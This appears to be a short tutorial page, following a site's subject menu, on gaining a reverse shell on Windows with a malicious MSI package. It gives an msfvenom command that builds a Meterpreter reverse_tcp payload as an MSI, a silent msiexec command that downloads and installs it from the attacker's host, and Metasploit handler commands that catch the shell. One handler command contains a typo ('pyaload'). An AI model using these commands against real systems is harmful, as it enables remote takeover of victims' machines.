- Data Structure
- Networking
- RDBMS
- Operating System
- Java
- MS Excel
- iOS
- HTML
- CSS
- Android
- Python
- C Programming
- C++
- C#
- MongoDB
- MySQL
- Javascript
- PHP
- Physics
- Chemistry
- Biology
- Mathematics
- English
- Economics
- Psychology
- Social Studies
- Fashion Studies
- Legal Studies
- Selected Reading
- UPSC IAS Exams Notes
- Developer's Best Practices
- Questions and Answers
- Effective Resume Writing
- HR Interview Questions
- Computer Glossary
- Who is Who
Get the Reverse Shell with MSI package
Windows OS comes installed with a Windows Installer engine which is used by MSI packages for the installation of applications. The executable program that interprets packages and installs products is Msiexec.exe.
Launch msiexec attack via msfvenom
Let’s generate an MSI Package file (1.msi) utilizing the Windows Meterpreter payload as follows;
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f msi > 1.msi
At the target end, when the victim execute the 1.msi file on the remote machine with the following utiliy;
msiexec /q /i http://192.168.1.109/1.msi
The attacker get the reverse shell of the victim machine by starting multi/handler as the listener.
- use exploit/multi/handler
- set pyaload windows/meterpreter/reverse_tcp
- set lhost 192.168.1.109
- exploit
Advertisements